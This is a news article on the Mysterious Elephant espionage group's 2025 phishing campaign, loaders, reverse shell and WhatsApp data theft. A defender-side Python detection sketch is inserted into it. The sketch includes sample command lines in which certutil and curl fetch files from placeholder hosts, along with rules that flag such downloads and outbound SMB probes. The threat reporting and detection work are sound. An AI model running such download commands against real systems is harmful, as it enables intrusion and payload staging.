Cyber Espionage in 2025: The Rise of Mysterious Elephant in Asia-Pacific

Mysterious Elephant: The Stealthy Hacker Group Targeting Asia’s Diplomatic Circles

The420 Correspondent

A shadowy hacker collective known as Mysterious Elephant has emerged as one of the most active Advanced Persistent Threat (APT) groups in the Asia-Pacific region. Discovered by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has evolved into a sophisticated cyber-espionage network targeting government and diplomatic entities across South and Southeast Asia.

Kaspersky’s latest report reveals that the group’s ongoing 2025 campaign marks a major escalation—deploying newly developed malware, hijacking WhatsApp data, and exploiting phishing tactics to infiltrate sensitive systems.

Origins and Evolution of the Threat

Initially detected through attack signatures similar to the Confucius APT group, Mysterious Elephant quickly stood out for its hybrid tactics. Investigators found that its malware integrated code from multiple threat actors, including Origami Elephant, Confucius, and SideWinder, suggesting either collaboration or resource sharing within the regional cybercrime ecosystem.


Unlike its predecessors, Mysterious Elephant didn’t just reuse old tools—it rebuilt and improved them. The group refined abandoned modules like Vtyrei, originally seen in earlier Asian espionage campaigns, to develop more resilient and stealthy attack frameworks.

New Tactics in 2025: Phishing, PowerShell, and Custom Malware

In early 2025, the group’s tactics, techniques, and procedures (TTPs) underwent a significant transformation. Spear phishing emerged as their main infiltration method, with highly personalized emails mimicking legitimate diplomatic communication.

The targets—primarily government departments in Pakistan, Bangladesh, Nepal, Afghanistan, and Sri Lanka—received fake documents linked to political or international events. One decoy referenced Pakistan’s bid for a non-permanent seat on the UN Security Council (2025–2026), a clever way to lure officials into opening infected attachments.

Once inside a network, the attackers deploy PowerShell scripts to execute hidden commands, download payloads, and establish persistence. These scripts disguise themselves as normal administrative functions, using tools like curl and certutil to communicate with attacker-controlled servers.

Advanced Tools: BabShell, MemLoader, and WhatsApp Data Theft

The group’s toolset has become increasingly specialized. Among its new arsenal is BabShell, a C++ reverse shell that enables real-time command execution on compromised systems. It gathers system details, creates execution threads, and transmits results to its command-and-control (C2) server, effectively giving hackers full interactive control.

Two loaders—MemLoader HidenDesk and MemLoader Edge—serve as key components of the infection chain.

  • HidenDesk loads payloads directly in memory to avoid detection, creates hidden virtual desktops for operations, and decrypts data using custom RC4-like encryption.
  • MemLoader Edge embeds the VRat backdoor, performs sandbox detection by probing bing.com:445, and executes payloads only when safe.
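A defender-side detection sketch for two behaviours this article describes: PowerShell-launched curl/certutil downloads (from the section on 2025 tactics above) and the bing.com:445 sandbox probe attributed to MemLoader Edge. This is an added example, not code from Kaspersky's report or from the group's tooling; the telemetry records, hostnames, paths and the 203.0.113.x address are constructed, and the field names are assumed.

```python
import ipaddress
import re

# Constructed sample telemetry, modelled loosely on Sysmon-style
# process-creation and network-connection records. All hosts, paths
# and the 203.0.113.x address are placeholders, not real indicators.
PROCESS_EVENTS = [
    {"parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://files.example.invalid/s.dat s.dat"},
    {"parent": "powershell.exe", "image": "curl.exe",
     "cmdline": "curl.exe -s -o C:\\Users\\Public\\p.bin http://cdn.example.invalid/p.bin"},
    {"parent": "explorer.exe", "image": "certutil.exe",          # benign admin use
     "cmdline": "certutil.exe -hashfile C:\\tools\\setup.msi SHA256"},
    {"parent": "cmd.exe", "image": "curl.exe", "cmdline": "curl.exe --version"},
]
NETWORK_EVENTS = [
    {"image": "loader.exe", "dest_host": "bing.com",
     "dest_ip": "203.0.113.10", "dest_port": 445},                 # sandbox probe
    {"image": "svchost.exe", "dest_host": "fs01.corp.local",
     "dest_ip": "10.0.4.12", "dest_port": 445},                    # normal file share
    {"image": "chrome.exe", "dest_host": "bing.com",
     "dest_ip": "203.0.113.10", "dest_port": 443},                 # normal browsing
]

SHELL_PARENTS = {"powershell.exe", "pwsh.exe"}
FETCH_TOOLS = {"curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def flag_shell_downloads(events):
    """PowerShell spawning curl/certutil with a URL on the command line:
    the download-and-stage behaviour the article attributes to the group."""
    return [ev for ev in events
            if ev["parent"].lower() in SHELL_PARENTS
            and ev["image"].lower() in FETCH_TOOLS
            and URL_RE.search(ev["cmdline"])]


def is_internal(ip):
    """True if the address falls in one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_external_smb(events):
    """TCP/445 to an address outside the internal ranges: SMB to the
    internet is rare in practice and matches the bing.com:445 check."""
    return [ev for ev in events
            if ev["dest_port"] == 445 and not is_internal(ev["dest_ip"])]
```

Both rules are starting points: tune the internal ranges to your own address plan and baseline legitimate certutil and curl usage before alerting on them.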

A particularly alarming innovation is the group’s ability to spy on WhatsApp communications. Through specialized exfiltration tools such as Uplo Exfiltrator, Stom Exfiltrator, and ChromeStealer Exfiltrator, the attackers steal files shared via WhatsApp Desktop, including documents, photos, archives, and chat data.

These tools recursively scan drives and system folders for sensitive file types, encrypt the stolen data, and upload it to C2 servers using disguised network protocols.

Infrastructure and Victim Profile

Mysterious Elephant operates a dynamic infrastructure of rotating domains and virtual private servers, using wildcard DNS and cloud-based hosting to obscure its trail. This flexibility allows it to continuously reconfigure its attack servers and stay ahead of security countermeasures.

Victim analysis shows a concentration in South Asia, primarily government departments, foreign affairs ministries, and diplomatic missions. Attackers craft personalized payloads for each victim, often embedding local political or administrative themes to enhance credibility.

A Threat to National Security

Cyber experts warn that the scale and precision of Mysterious Elephant’s attacks signal a long-term espionage strategy, not short-term financial crime. The stolen data—ranging from diplomatic correspondence to official documents—poses serious risks to national security and geopolitical stability in the region.

Kaspersky researchers emphasize that while the group’s methods evolve rapidly, consistent patterns like custom loader use, encrypted exfiltration, and targeted phishing remain the core of its operations.

Governments and institutions are urged to tighten network monitoring, enforce strict patching schedules, and conduct cybersecurity training to defend against this persistent threat. Collaboration between international agencies remains critical to tracking and disrupting Mysterious Elephant’s expanding operations.
